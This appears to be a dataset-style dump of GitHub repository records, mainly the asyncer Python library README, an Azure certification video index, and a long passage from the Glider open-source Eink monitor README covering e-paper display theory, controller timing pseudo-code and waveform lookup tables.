Pinout of the Webcam.
| Documentation for the Mainboard and other modules in the Framework Laptop 13 | framework,frameworklaptop | 0 | 8 | 13 | 81 | 12 | 2 | 1 |
tiangolo/asyncer | <p align="center">
<a href="https://asyncer.tiangolo.com"><img src="https://asyncer.tiangolo.com/img/logo-margin/logo-margin-vector.svg" alt="Asyncer"></a>
</p>
<p align="center">
<em>Asyncer, async and await, focused on developer experience.</em>
</p>
<p align="center">
<a href="https://github.com/tiangolo/asyncer/actions?query=workflow%3ATest" target="_blank">
<img src="https://github.com/tiangolo/asyncer/workflows/Test/badge.svg" alt="Test">
</a>
<a href="https://github.com/tiangolo/asyncer/actions?query=workflow%3APublish" target="_blank">
<img src="https://github.com/tiangolo/asyncer/workflows/Publish/badge.svg" alt="Publish">
</a>
<a href="https://coverage-badge.samuelcolvin.workers.dev/redirect/tiangolo/asyncer" target="_blank">
<img src="https://coverage-badge.samuelcolvin.workers.dev/tiangolo/asyncer.svg" alt="Coverage">
</a>
<a href="https://pypi.org/project/asyncer" target="_blank">
<img src="https://img.shields.io/pypi/v/asyncer?color=%2334D058&label=pypi%20package" alt="Package version">
</a>
</p>
---
**Documentation**: <a href="https://asyncer.tiangolo.com" target="_blank">https://asyncer.tiangolo.com</a>
**Source Code**: <a href="https://github.com/tiangolo/asyncer" target="_blank">https://github.com/tiangolo/asyncer</a>
---
**Asyncer** is a small library built on top of <a href="https://anyio.readthedocs.io/en/stable/" class="external-link" target="_blank">AnyIO</a>.
**Asyncer** has a small number of utility functions that allow working with `async`, `await`, and concurrent code in a more convenient way under my (<a href="https://twitter.com/tiangolo" class="external-link" target="_blank">@tiangolo - Sebastián Ramírez</a>) very opinionated and subjective point of view.
The main goal of **Asyncer** is to improve **developer experience** by providing better support for **autocompletion** and **inline errors** in the editor, and **more certainty** that the code is **bug-free** by providing better support for type checking tools like **mypy**.
**Asyncer** also tries to improve **convenience** and simplicity when working with **async** code **mixed** with regular <abbr title="synchronous code, code that is not async">**blocking code**</abbr>, allowing to use them together in a simpler way... again, under my very **subjective** point of view.
## 🚨 Warning
This small library only exists to be able to use these **utility functions** until (and if) they are integrated into **AnyIO**.
It will probably take some time for that to happen (or to be decided if it will be included or not).
So I made this to be able to use these ideas right now. 🤓
## Can I Use It?
Yes 🎉 (but continue reading).
You can use this and evaluate the **library API design** I'm proposing. It will probably be useful to know if it works and is useful for you (I hope so).
But still, consider this lab material, expect it to change a bit. 🧪
If you use it, **pin the exact Asyncer version** for your project, to make sure it all works.
Have **tests** for your project (as you should, anyway). And **upgrade the version** once you know that the new version continues to work correctly.
Still, it's **just 4 functions**, so there's not much to change, if you had to refactor your code to update something it would not be much.
And if you don't want to add `asyncer` as a dependency to your project, you can also just copy the main file and try out those functions, it's quite small (but in that case you won't get updates easily).
## Requirements
As **Asyncer** is based on **AnyIO** it will be also installed automatically when you install **Asyncer**.
## Installation
<div class="termy">
```console
$ pip install asyncer
---> 100%
Successfully installed asyncer anyio
```
</div>
## How to Use
You can read more about each of the use cases and utility functions in **Asyncer** in the <a href="https://asyncer.tiangolo.com/tutorial/" class="external-link" target="_blank">tutorial</a>.
As a sneak preview of one of the utilities, you can **call sync code from async code** using `asyncify()`:
```Python
import time
import anyio
from asyncer import asyncify
def do_sync_work(name: str):
time.sleep(1)
return f"Hello, {name}"
async def main():
message = await asyncify(do_sync_work)(name="World")
print(message)
anyio.run(main)
```
**Asyncer**'s `asyncify()` will use AnyIO underneath to do *the smart thing*, avoid blocking the main **async** event loop, and run the **sync**/blocking function in a **worker thread**.
### Editor Support
Everything in **Asyncer** is designed to get the best **developer experience** possible, with the best editor support.
* **Autocompletion** for function arguments:
<img class="shadow" src="https://asyncer.tiangolo.com/img/tutorial/asyncify/image01.png">
* **Autocompletion** for return values:
<img class="shadow" src="https://asyncer.tiangolo.com/img/tutorial/asyncify/image02.png">
* **Inline errors** in editor:
<img class="shadow" src="https://asyncer.tiangolo.com/img/tutorial/soonify/image02.png">
* Support for tools like **mypy**, that can help you verify that your **code is correct**, and prevent many bugs.
## License
This project is licensed under the terms of the [MIT license](https://github.com/tiangolo/asyncer/blob/main/LICENSE).
| Asyncer, async and await, focused on developer experience. | python,async,asyncio,trio,anyio | 7 | 13 | 152 | 203 | 2 | 13 | 8 |
johnthebrit/CertificationMaterials | # Certification Materials
A collection of materials related to my certification videos hosted on YouTube.
https://onboardtoazure.com (https://youtube.com/ntfaqguy)
Please [subscribe](https://www.youtube.com/channel/UCpIn7ox7j7bH_OFj7tYouOQ?sub_confirmation=1) and support my channel. Thank you.
I have a recommended full path with other useful links and materials at https://learn.onboardtoazure.com. This includes my content, links to Microsoft materials, exam sandbox environment links and more.
## Video and Whiteboard Index
Getting started learning Azure introduction video - https://youtu.be/V1Hk45XD6Qw
| Video/Playlist | Artifact |
|--|--|
| [AZ-900 Full Course](https://youtube.com/playlist?list=PLlVtbbG169nED0_vMEniWBQjSoxTsBYS3) | [AZ-900 Course Handout](https://github.com/johnthebrit/AZ900CertCourse/blob/main/John%20Savill's%20AZ-900%20Azure%20Fundamentals%20Certification%20Course%20Handout.pdf) |
| [AZ-900 Study Cram](https://youtu.be/tQp1YkB2Tgs) | [AZ-900 Study Cram Whiteboard](/whiteboards/AZ-900-Whiteboard.png) |
| [AI-900 Study Cram](https://youtu.be/E9aarWMLJw0) | [AI-900 Study Cram Whiteboard](/whiteboards/AI-900-Whiteboard.png) |
| [DP-900 Study Cram](https://youtu.be/0gtpasITVnk) | [DP-900 Study Cram Whiteboard](/whiteboards/DP-900-v2-whiteboard.png) |
| [MS-900 Study Cram](https://youtu.be/np9jfnwnO2c) | [MS-900 Study Cram Whiteboard](/whiteboards/MS-900v2.png) |
| [PL-900 Study Cram](https://youtu.be/lbPHM-MiEUA) | [PL-900 Study Cram Whiteboard](/whiteboards/PL-900-Whiteboard.png) |
| [SC-900 Study Cram](https://youtu.be/Bz-8jM3jg-8) | [SC-900 Study Cram Whiteboard](/whiteboards/SC-900-Whiteboard.png) |
| [AZ-104 Study Playlist](https://youtube.com/playlist?list=PLlVtbbG169nGlGPWs9xaLKT1KfwqREHbs) | |
| [AZ-104 Study Cram](https://youtu.be/VOod_VNgdJk) | [AZ-104 Study Cram Whiteboard](/whiteboards/AZ-104-Whiteboard.png) |
| [SC-100 Study Playlist](https://www.youtube.com/playlist?list=PLlVtbbG169nHcbeVtWUfP8BeEjGniBJeb) | |
| [SC-100 Study Cram](https://youtu.be/2Qu5gQjNQh4) | [SC-100 Study Cram Whiteboard](/whiteboards/SC-100-Whiteboard.png) |
| [SC-300 Study Playlist](https://youtube.com/playlist?list=PLlVtbbG169nGj4rfaMUQiKiBZNDlxoo0y) | |
| [SC-300 Study Cram](https://youtu.be/LGpgqRVG65g) | [SC-300 Study Cram Whiteboard](/whiteboards/SC-300-Whiteboard.png) |
| [AZ-500 Study Playlist](https://youtube.com/playlist?list=PLlVtbbG169nHw9T1L_CiLxC-DTwKu-BZG) | |
| [AZ-500 Study Cram](https://youtu.be/6vISzj-z8k4) | [AZ-500 Study Cram Whiteboard](/whiteboards/AZ-500-Whiteboard.png) |
| [AZ-700 Study Playlist](https://youtube.com/playlist?list=PLlVtbbG169nGeFODKRZhjqdSxFpSPXVOa) | |
| [AZ-700 Study Cram](https://youtu.be/nVZYDhB_M64) | [AZ-700 Study Cram Whiteboard](/whiteboards/AZ-700-Whiteboard.png) |
| [AZ-305 Study Playlist](https://youtube.com/playlist?list=PLlVtbbG169nHSnaP4ae33yQUI3zcmP5nP) | |
| [AZ-305 Study Cram](https://youtu.be/vq9LuCM4YP4) | [AZ-305 Study Cram Whiteboard](/whiteboards/AZ-305-Whiteboard.png) |
| [AZ-400 DevOps Master Class](https://youtube.com/playlist?list=PLlVtbbG169nFr8RzQ4GIxUEznpNR53ERq) | [DevOps Master Class Materials Repo](https://github.com/johnthebrit/DevOpsMC)|
Certification renewal experience video - https://youtu.be/L9luTi9LyXU | A collection of materials related to my certification videos | null | 2 | 1 | 0 | 18 | 0 | 1 | 0 |
Modos-Labs/Glider | # Glider
Open-source Eink monitor with an emphasis on low latency.
Note: This repo only contains the hardware design; the gateware running on the FPGA is my open-source [Caster EPDC](https://gitlab.com/zephray/Caster/) design. This README also contains information about Caster.
![Hardware Photo](assets/hw_with_screen.jpg)
This is a long document, containing not just information about this project, but also pretty much everything I know about Eink. Given it's a bit hard to gather information about Eink online, I think this is the right thing to do. Use the following table of contents to navigate around.
Eink is a registered trademark and brand of E Ink Corporation. All the contents provided in this repo are based on publicly available information online and original research. They are not endorsed by Eink in any way and may contain errors and/or inaccuracies.
If you're interested in obtaining a board, or the reference monitor, see and subscribe to the [pre-launch page for the Modos Paper Monitor on Crowd Supply](https://www.crowdsupply.com/modos-tech/modos-paper-monitor) for updates.
If you are interested in Eink or any other display technologies, I have a Discord server for that. Feel free to join: https://discord.gg/rtT7euSHQS . (This Discord server is also not endorsed by Eink or any other company. It's not a customer support server.)
## Table of Contents
- [Overview](#overview)
- [Features](#features)
- [Hardware](#hardware)
- [Components](#components)
- [Eink Screens](#eink-screens)
- [Basic Theory of Operation](#basic-theory-of-operation)
- [Advantages and Disadvantages](#advantages-and-disadvantages)
- [The Role of Eink Controller](#the-role-of-eink-controller)
- [Screen Panel Types](#screen-panel-types)
- [Using Screen with Integrated Controller](#using-screen-with-integrated-controller)
- [Using Screen without Integrated Controller](#using-screen-without-integrated-controller)
- [Understanding Waveform](#understanding-waveform)
- [Greyscale Display](#greyscale-display)
- [Color Display](#color-display)
- [Dithering](#dithering)
- [Eink Screen Generations](#eink-screen-generations)
- [Caster/ Glider Design](#design-of-caster-and-glider)
- [Low Latency Drive](#low-latency-drive)
- [Hybrid Greyscale Mode](#hybrid-greyscale-mode)
- [Limitations](#limitations)
- [Hardware Design Decisions]()
- [Gateware Architecture](#gateware-architecture)
- [Firmware Functions](#firmware-functions)
- [Resources Utilization](#resources-utilization)
- [Building](#building)
- [PCB](#pcb)
- [FPGA Bitstream](#fpga-bitstream)
- [MCU Firmware](#mcu-firmware)
- [Working with Waveforms](#working-with-waveforms)
- [Compatible Screens](#compatible-screens)
- [References](#references)
- [License](#license)
- [Appendix](#appendix)
- [Using Screens without Datasheet](#using-screens-without-datasheet)
- [Screen List](#screen-list)
## Overview
### Features
- Complete solution for low-latency/ high-refresh-rate EPD monitor
- Supports electrophoretic display panels with parallel I/F (Eink(R), SiPix and DES)
- Supports both monochrome and color-filter-array (such as Kaleido(TM)) based color screen
- Extremely low processing delay of \<20 us
- Supports binary, 4-level grayscale, and 16-level grayscale output modes
- Latency-optimized binary and 4-level grayscale driving modes
- Hybrid automatic binary and 16-level grayscale driving mode
- Host software runtime controllable regional update and mode switching
- Hardware Bayer dithering, blue-noise dithering, and error-diffusion dithering with no additional latency
- Controller natively supports FPD-Link (LVDS), DVI (TMDS), and MIPI-DSI input
- Board-level design supports USB-C (USB Type-C DisplayPort Alt Mode) and DVI input
### Hardware
![r0p7_mb](assets/r0p7_mb.jpg)
- Xilinx(R) Spartan-6 LX16 FPGA running Caster
- DDR3-800 framebuffer memory
- Type-C DisplayPort Alt-Mode video input with onboard PTN3460 DP-LVDS bridge or
- DVI (via microHDMI connector) video input with onboard ADV7611 decoder
- Epaper power supply with up to 1A peak current on +/-15V rail supporting large panels
- VCOM kick-back voltage measurement support
- On-board RaspberryPi(R) RP2040 microcontroller for USB communication and firmware upgrade
- Up to 133MP/s processing rate with dithering enabled, >200MP/s when disabled
The board is designed with KiCad. You may need the latest stable version of KiCad to open the source file.
### Components
This repo hosts the PCB design, firmware source code, and a reference 3D-printable case design. The RTL code is in a separate repo: [https://gitlab.com/zephray/Caster/](https://gitlab.com/zephray/Caster/).
## Eink Screens
Eink is the brand of a family of paper-like electrophoretic displays. The underlying technology was invented in the MIT Media Lab between 1995 and 1997 by Barrett Comiskey, J.D. Albert, and Joseph Jacobson. They later founded the E Ink Corporation to commercialize this technology.
Nowadays they are commonly used on e-readers and electronic shelf labels. You’ve probably seen them on Kindle, in stores, or maybe in some train stations as well.
| eReader/ Tablets | Electronic Shelf Label | Digital Signage |
|-|-|-|
| ![app_ereader](assets/app_ereader.jpg) | ![app_esl](assets/app_esl.jpg) | ![app_signage](assets/app_signage.jpg) |
(Source: https://www.eink.com/application, image copyright Eink corporation)
This section gives an overview of the electrophoretic displays, including the screen panels available and underlying technology. Note this project doesn't and can't support all electrophoretic screens. This documentation also solely focuses on using existing off-the-shelf screen panels rather than the physics or manufacturing process of one.
### Basic Theory of Operation
In the simplest form, you have charged particles with different colors, dispersed in some oil in some transparent container. By applying electric fields the particles can be moved up or down to produce either black or white, or a mixture of that.
![eink-particle](assets/eink_carta.gif)
(Source: https://www.eink.com/tech/detail/How_it_works , copyright Eink Corporation)
There are multiple technologies based on this basic concept, namely Eink’s micro-capsule display, SiPix (now acquired by Eink)’s micro-cup display, and WFT’s DES display. They differ in specific ways of confining the particles in containers, but otherwise very similar.
The pixels on the screen are typically arranged as a 2D array, driven with TFTs. The pixels are scanned/ driven periodically at a fixed refresh rate, typically ranging from 50Hz to 120Hz. Applying positive voltage on the pixel will typically drive the particles toward the white state while applying negative voltage will drive the particles towards the black state. This is similar to active matrix TN/IPS LCDs, which also use 2D TFT arrays and electrical fields for changing state. However, unlike LCDs, EPDs maintain their state after the electrical field is removed. So unlike LCDs which require continuous refreshing, the EPDs only need to be refreshed till the pixels are fully driven.
In terms of driving the screen panel, depending on the pixel value (1 or 0), each pixel would be driven either with a positive voltage or a negative voltage. A global counter can be used to count the frames elapsed and stop driving the pixels after a predefined period of time (for example, 100ms). Two framebuffers are typically used for determining if the pixel has changed color or not. If not, then the pixel does not need to be driven.
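To make that concrete, here is a simplified software model of the binary driving decision. It is illustrative only; the real logic lives in the Caster RTL, and the frame count used here is a made-up value.

```python
# Simplified software model of binary EPD driving (illustrative only).
# Return value is the voltage polarity applied to one pixel this frame:
# +1 = drive towards white, -1 = drive towards black, 0 = no operation.
DRIVE_FRAMES = 10  # assumed number of frames to fully drive a pixel (made-up value)

def pixel_voltage(prev_state: int, target_state: int, frames_elapsed: int) -> int:
    """Decide what to apply to one pixel on this refresh frame (1 = white, 0 = black)."""
    if prev_state == target_state or frames_elapsed >= DRIVE_FRAMES:
        return 0                     # no change needed, or already fully driven
    return +1 if target_state == 1 else -1
```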
### Advantages and Disadvantages
In terms of display quality, EPDs are no match for modern IPS LCDs. The following is a comparison table of key parameters. The specific number would vary depending on the screen used but should be within the same ballpark.
| | Monochrome EPD | CFA-based Color EPD | Transmissive TFT IPS LCD | Reflective TFT TN LCD |
|-|-|-|-|-|
| Contrast Ratio | ~17:1 | ~14:1 | ~1000:1 | ~14:1 |
| Colors | 16 (Greyscale) | 4096 | 16M | 256 |
| Color Gamut | N/A | ~1.5% sRGB | ~99.9% sRGB | N/A |
| Reflectivity | ~45% | ~25% | N/A | ~15% |
| Response Time | ~150ms | ~150ms | ~10ms | ~15ms |
It has a few advantages. It reflects lights instead of emitting lights, so it generally consumes less power and can be used outdoors, etc. It’s also bistable, which means that it retains the image after the power has been removed. Personally, the biggest differentiating factor for me (author of this README) is that it looks like paper.
![rlcd-vs-eink](assets/rlcd_eink.gif)
The image above shows a comparison between a reflective TFT LCD (a SHARP memory LCD in this case) and Eink. The LCD has a mirror-like texture whose reflectivity changes drastically at different angles, while the Eink is more paper-like.
| ZBD LCD | Ch LCD | STN LCD |
|-|-|-|
| ![zbd](assets/zbdlcd.jpg) | ![chlcd](assets/chlcd.jpg) | ![stnlcd](assets/stnlcd.jpg) |
| Bistable, reflective, high contrast, no greyscale, ~10s refresh | Bistable, reflective, lower contrast, up to 32 level greyscale, ~5s refresh | Volatile, reflective, lower contrast, up to 32 level greyscale, ~100ms response |
The table above lists a few of the many other reflective or bistable display technologies. They are all interesting displays in their own right, but none of them feels like paper (yet).
Overall, there is no single perfect display technology. Each has its own unique strength. Pick the right one for your project.
### The Role of Eink Controller
The Eink controller is in some ways similar to the display controller (DC/ CRTC) + timing controller (TCON) in a typical LCD-based system. It takes the raw image data and converts it to signals required to drive the screen.
![eink-controller](assets/eink_controller.svg)
To understand what an Eink controller actually does, start from the basic concept: the color of a pixel can be changed by applying a positive or negative voltage for a finite period of time. From the controller's perspective, depending on the current state and the desired state of a pixel, there are 4 possibilities:
| Current State | Target State | Action |
|-|-|-|
| Black | Black | No operation |
| Black | White | Apply positive voltage |
| White | Black | Apply negative voltage |
| White | White | No operation |
The controller needs to store and maintain the screen state inside of its own buffer memory, so it would typically have a large on-chip SRAM or an off-chip SDRAM controller. The controller should also have a timer to ensure the screen doesn't get overdriven or underdriven.
The controller often uses the so-called "[waveform](#understanding-waveform)" to replace the action column of the previous table. Instead of hardcoding the action for state transition, the actions are stored into a look-up-table (LUT) which can be modified at runtime to allow higher flexibility.
Controllers may also offer more advanced features such as [dithering](#dithering) acceleration, multiple region updates, automatic LUT selection, etc.
### Screen Panel Types
As discussed in the previous section, an Eink screen needs to be coupled with an Eink controller to function. Aside from that, the screen also needs high-voltage drivers to drive the TFTs and the pixels. Virtually all E-paper panels use either COG (Chip-on-Glass) or TAB (Tape Automated Bonding) to integrate some chips onto the screen panel itself. Most of the screens available today can be divided into two categories based on whether or not the controller is integrated:
![screen-types](assets/screen_types.svg)
Here is a non-exhaustive list of common sizes for each type (the size or resolution is not inherently related to or limited by the type; it is just that, for a given size, vendors tend to make all panels the same type):
- Screens without controller: 4.3", 6.0", 7.8", 8.0", 9.7", 10.3", 13.3", 25.3", 31.2", 42"
- Screens with controller: 1.02", 1.54", 2.13", 2.6", 2.9", 3.71", 4.2", 5.65", 5.83", 7.5", 12.48"
One may notice that almost all e-readers/e-ink cellphones use screens without controllers, while almost all e-ink electronic shelf labels (ESL) use screens with controllers. This gives some hints about the advantages and disadvantages of the two types:
| | Without Controller | With Controller |
|-|-|-|
| System Cost | High. A dedicated controller or SoC with an integrated controller is usually required. Needs a dedicated power supply. | Low. Virtually any MCU can drive the screen directly, and the power supply is integrated. |
| Greyscale Levels | Generally 16 (4bpp), up to 32 (5bpp) | Generally 2 (BW only) or 4 (2bpp), with some hack, up to 16 (4bpp) |
| Refresh Speed | Generally fast (100ms~300ms) for BW. Depends on the screen used and the system architecture | Generally fast (100ms~300ms) for BW if partial refresh is enabled. Greyscale is much slower, and BWR or BWY screens are even slower. |
| Total Update Latency | Generally the same as refresh time. Depends on the system architecture | Slow. Ranging from 100ms to several seconds based on the resolution. |
Please keep in mind that this discussion is about off-the-shelf screens you can buy today. These tradeoffs do not necessarily come from whether the controller is integrated or not.
Note that I mentioned the refresh speed and total update latency. They are different:
The refresh speed refers to the duration of the refresh itself: from when the screen starts visibly changing to when it finishes showing the new content.
The total update latency refers to the time from when the processor requests a screen update to when the screen finishes showing the new content. As you can see, this is the biggest issue for screens with integrated controllers, and it is the main reason why they are rarely used in e-readers, cell phones, or PC monitors.
![screen-controller-diagram](assets/screen_cntlr.svg)
This diagram illustrates the difference between the two. It should be noted that the screens without controllers have the flexibility to be driven quickly, but the system designer might not architect the system for low latency.
### Using Screen with Integrated Controller
Screens with integrated controllers have almost everything already integrated. Common display panels of this type only need a few external capacitors, inductors, and MOSFETs to support the integrated bipolar power supply circuit; they can then be hooked up to MCUs or MPUs over common interfaces like SPI or I2C. There are a lot of driver boards and examples for these screens available online.
To be expanded (TODO)
### Using Screen without Integrated Controller
This could get complicated. Note that I used a lot of "generally" in the previous comparison table because there are many ways one could drive these screens, and some of them certainly impact performance. The main issue here is the controller chip. There are three ways to drive these screens:
- Using a dedicated controller chip to drive the screen
- Using an SoC that has an integrated controller
- Using a fast MCU/SoC to emulate the controller with GPIO (software timing controller)
Then, again here is a comparison between them:
| | Specialized controller chip | SoC with integrated controller | MCU + Software TCON |
|-|-|-|-|
| Resolution | UXGA+ | UXGA+ | Limited by MCU RAM. Up to XGA with SRAM, UXGA with PSRAM, UXGA+ with DDR |
| Greyscale | Up to 32 | Up to 32 | Up to 32 |
| Partial Update | Yes | Yes | Yes |
| Total Update Latency | Depends. Could be very close to refresh speed, could be slow like screens with controller | Same as refresh speed | Same as refresh speed if data is internally generated (not streaming from an external device such as a PC) |
| Suitable Applications | IoT devices, E-readers, cellphones, E-ink monitors. possibly E-ink laptops | Advanced IoT devices, E-readers, cellphones, E-ink typewriters, possibly lower performance E-ink laptops | When using MCU: IoT devices, large ESLs, simple DIY E-readers. When using MPU: Same as SoC with integrated controller |
A dedicated controller can accept data from external devices, which allows it to be used in many different types of applications, ranging from IoT devices and ESLs to PC monitors, with relatively fast refresh and low latency.
When using an SoC or MCU, the display content is generated by the SoC or MCU itself, so the result is ultimately limited by its capability. Given that current SoCs with integrated E-ink display controllers are usually limited in performance, the range of applications is limited as well; the same goes for MCUs, which can only do what an MCU can do. You could find ways to stream video data into the SoC or MCU over USB, a camera interface, WiFi, etc., but this might not be optimal.
#### Existing Solutions
- Specialized controller chip
  - Closed-source
    - EPSON S1D13xxx: Widely used EPD controller in early E-readers. Proprietary, no documents available. Probably EOL.
    - IT8951: Used on the Waveshare EPD HAT. Documents are available. It works with large EPDs up to 2048x2048. The drawback is speed, as the interface between the processor and the IT8951 can be slow. This is similar to the situation with screens with integrated controllers.
    - T1000: Also known as IT8957, an upgraded model of the IT8951. It supports even higher resolutions and features a faster MIPI DSI interface to mitigate the slow interface of the IT8951.
    - Waveshare HDMI driver board: FPGA-based controller. Closed source but easily purchasable, and could be integrated into larger projects as a module.
  - Open-source
    - This project (Caster + Glider): FPGA-based controller with multiple update modes, ultra-low latency processing, and a wide range of supported screens.
    - https://hackaday.io/project/21607-paperback-a-desktop-epaper-monitor: FPGA-based controller. However, it doesn't support partial update mode and is slower.
    - https://hackaday.io/project/21168-fpga-eink-controller: FPGA-based controller that supports vendor waveforms with reasonable speed.
- SoC with integrated controller
  - RK29xx: Fairly old, Cortex-A8 based (RPi 1 level performance), 55nm, EOL
  - RK3026/RK3028: Fairly old, Cortex-A9 based (RPi 2 level performance), 40nm, EOL
  - i.MX 50: Fairly old, Cortex-A8 based (RPi 1 level performance), 65nm, in production
  - i.MX 6ULL: Cortex-A7 based (RPi 1 level performance), 40nm, in production
  - i.MX 6S/D: Fairly old, Cortex-A9 based (RPi 2-3 level performance), 40nm, in production
  - i.MX 7S/D: Cortex-A7 based (RPi 2 level performance), 28nm, in production
  - i.MX 8ULP: Cortex-A35 based (RPi 2 level performance), 28nm FD-SOI, in production
  - AW B200: Cortex-A53 based (RPi 2 level performance), 28nm, in production
  - MT8113: Cortex-A53 based (RPi 2 level performance), 12nm, in production
  - RK3566/RK3568: Cortex-A55 based (RPi 3 level performance), 22nm, in production
  - RK3576: Cortex-A72 + A53 based (RPi 4-5 level performance), 8nm, in production
- MCU/SoC + Software TCON
  - http://essentialscrap.com/eink/waveforms.html: One of the earliest e-ink hacks. Limited in performance but could still be used as a reference
  - NekoCal: One of the earliest e-ink software TCONs with greyscale support. Used to be available as a DIY kit. No longer updated, but could still be used as a reference
  - InkPlate 6/10: Commercially available. Based on ESP32.
  - EPDiy: Based on ESP32, supports a lot of different screens; recommended if you want to build a device with ESP32 + Eink or embed it into a larger project.
#### Interface Signals and Timing
The interface signals and timing are fairly similar to LCDs without a controller. Following is the list of signals typically found on EPDs:
- GDOE/ MODE: Gate driver output enable
- GDCLK/ CKV: Gate driver clock (like HSYNC in LCD)
- GDSP/ SPV: Gate driver start pulse (like VSYNC in LCD)
- SDCLK/ XCL: Source driver clock (like PCLK in LCD)
- SDLE/ XLE: Source driver latch enable (like HSYNC in LCD)
- SDOE/ XOE: Source driver output enable
- SDCE/ XSTL: Source driver start pulse (like DE in LCD)
- SD: Source driver data (8-bit or 16-bit)
SD signals go into the source driver, typically in the X direction. GD signals go into the gate driver, typically in the Y direction. It's a 2D array: the gate driver selects one line at a time, and the source driver outputs the voltages for all the pixels in that line.
Conceptually, it's like a raster scan on a CRT. To send one field of data, both GD and SD are reset to the start position by using the start pulse signal. Data are then transmitted into the source driver 4 or 8 pixels at a time. Once the line has been fully transmitted, the source driver is reset to the beginning position by a start pulse signal, and the gate driver moves to the next line by a pulse on the gate driver clock. Once all lines have been scanned, the entire process repeats for the next field.
One notable difference from LCDs is that each pixel is represented by 2 bits. This, however, doesn't mean each pixel is 2bpp or 4-level greyscale. The 2 bits per pixel are used to encode the voltage applied to the pixel:
- 00: No voltage
- 01: Negative voltage
- 10: Positive voltage
- 11: No voltage
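For example, with an 8-bit data bus, 4 pixels are packed into each bus word. Here is a minimal sketch of the packing (the voltage codes follow the list above; the bit order is an assumption and should be checked against the specific panel's datasheet):

```c
#include <stdint.h>

// Voltage codes as sent on the source driver data bus (2 bits per pixel)
#define VOLT_NONE 0x0  // no voltage (00 or 11)
#define VOLT_NEG  0x1  // negative voltage: drive towards black
#define VOLT_POS  0x2  // positive voltage: drive towards white

// Pack 4 per-pixel voltage codes into one byte for an 8-bit wide bus.
// Pixel 0 is assumed to occupy the most significant bits; the actual bit
// order depends on the specific panel.
static inline uint8_t pack_4_pixels(const uint8_t v[4]) {
    return (uint8_t)((v[0] << 6) | (v[1] << 4) | (v[2] << 2) | v[3]);
}
```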
Just like CRT/ LCD, there are also blanking periods in the entire timing (which means it's just waiting without active pixel data being sent). They have identical meanings to CRT/ LCD systems:
![display-timings](assets/display-timings.png)
(Source: https://projectf.io/posts/video-timings-vga-720p-1080p/, Copyright Will Green)
The following is a piece of pseudo-code implementing the Eink timing:
```c
#include <stdbool.h>

#define DATA_BUS_WIDTH 8                      // 8-bit wide source driver data bus
#define PIXEL_PER_CYCLE (DATA_BUS_WIDTH / 2)  // 2 bits per pixel
#define VFP 12   // Vertical front porch (lines)
#define VSYNC 1  // Vertical sync length (lines)
#define VBP 2    // Vertical back porch (lines)
#define VACT 758 // Vertical active lines
#define HFP 72   // Horizontal front porch (cycles)
#define HSYNC 2  // Horizontal sync length (cycles)
#define HBP 2    // Horizontal back porch (cycles)
#define HACT (1024 / PIXEL_PER_CYCLE) // Horizontal active cycles

// sdclk/sdce/sdle/sdoe/gdclk/gdsp/gdoe stand for the GPIO outputs wired to the
// corresponding panel signals listed above; send_data() outputs the next
// PIXEL_PER_CYCLE pixels on the SD data bus.

void pulse_h_clock() {
    sdclk = 1;
    sdclk = 0;
}

// Drive one line (one gate clock period), including horizontal blanking
void drive_line(bool v_in_act) {
    sdce = 1;
    gdclk = 0;
    for (int i = 0; i < HFP; i++) pulse_h_clock();
    sdle = 1;   // latch the previously transmitted line into the source driver
    gdclk = 1;  // advance the gate driver to the next line
    for (int i = 0; i < HSYNC; i++) pulse_h_clock();
    sdle = 0;
    for (int i = 0; i < HBP; i++) pulse_h_clock();
    if (v_in_act) sdce = 0; // start pulse asserted (low) only during active lines
    for (int i = 0; i < HACT; i++) {
        send_data();
        pulse_h_clock();
    }
}

// Drive one frame (one field), including vertical blanking
void drive_frame() {
    gdoe = 0;
    sdoe = 0;
    gdsp = 1;
    for (int i = 0; i < VFP; i++) drive_line(false);
    gdsp = 0;   // gate driver start pulse (active low in this sequence)
    gdoe = 1;
    sdoe = 1;
    for (int i = 0; i < VSYNC; i++) drive_line(false);
    gdsp = 1;
    for (int i = 0; i < VBP; i++) drive_line(false);
    for (int i = 0; i < VACT; i++) drive_line(true);
}
```
More explanation can be found at [http://essentialscrap.com/eink/index.html](http://essentialscrap.com/eink/index.html)
### Understanding Waveform
The waveform is a look-up table for the eink controller to determine how to drive the pixels, mostly useful for greyscale image display, but generally used for binary image display as well.
The look-up table has 3 inputs (dimensions): frame number, source grayscale level, and destination grayscale level. During the update process, for a given pixel, the source and destination levels stay the same while the frame number increases each frame. The look-up is done for every pixel every frame. The controller may choose different LUTs depending on the ambient temperature. Mode switching is also implemented by simply switching between different LUTs.
This is essentially what a typical eink controller does: for each pixel, look up the voltage to use in the table. Repeat this over a number of frames with an incrementing frame counter, until all pixels are fully driven.
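A minimal sketch of this per-frame lookup loop is shown below. The array layout, buffer names, and `output_pixel()` are illustrative only, not any particular controller's internal format:

```c
#include <stdint.h>

#define WIDTH  800
#define HEIGHT 600
#define FRAMES 38   // frame count of the selected mode/temperature LUT

// lut[src][dst][frame] -> voltage code (0: none, 1: VNEG, 2: VPOS)
extern const uint8_t waveform_lut[16][16][FRAMES];

extern uint8_t src_image[WIDTH * HEIGHT];  // greyscale level (0..15) before the update
extern uint8_t dst_image[WIDTH * HEIGHT];  // greyscale level (0..15) after the update

void output_pixel(uint8_t voltage);        // hypothetical: send the 2-bit code to the panel

void drive_greyscale_update(void) {
    for (int frame = 0; frame < FRAMES; frame++) {
        for (int i = 0; i < WIDTH * HEIGHT; i++) {
            uint8_t volt = waveform_lut[src_image[i]][dst_image[i]][frame];
            output_pixel(volt);
        }
    }
}
```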
It should be obvious that the waveform file itself is independent of the screen resolution, as the waveform only concerns a single pixel. Even with an incorrect or suboptimal waveform, the screen should at least display some recognizable image.
#### Waveform Example
There are several sample waveform tables provided in the project repo. Take the GC16 (Greyscale clearing 16-level) waveform of GDEW101C01 as an example: https://github.com/zephray/NekoInk/blob/master/waveform/gdew101_gd/test_M2_T0.csv
Take one line from that file:
```6,13,0,0,0,0,0,0,0,0,0,2,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,0```
This means that to transition from greyscale level 6 to level 13, the pixel needs to go through the following sequence. Each number is the operation for that frame: 0 is no-operation, 1 is darken, and 2 is lighten. In this case, there are 38 frames: the first 9 frames do nothing, then lighten for 1 frame, darken for 10 frames, lighten for 16 frames, and finally darken for 1 frame and do nothing for the last frame. This is the sequence to change a pixel from level 6 to level 13. Such a lookup is done for every pixel on every frame.
For specifics on waveform file formats, check the [Working with Waveforms](#working-with-waveforms) section.
#### Waveform Modes
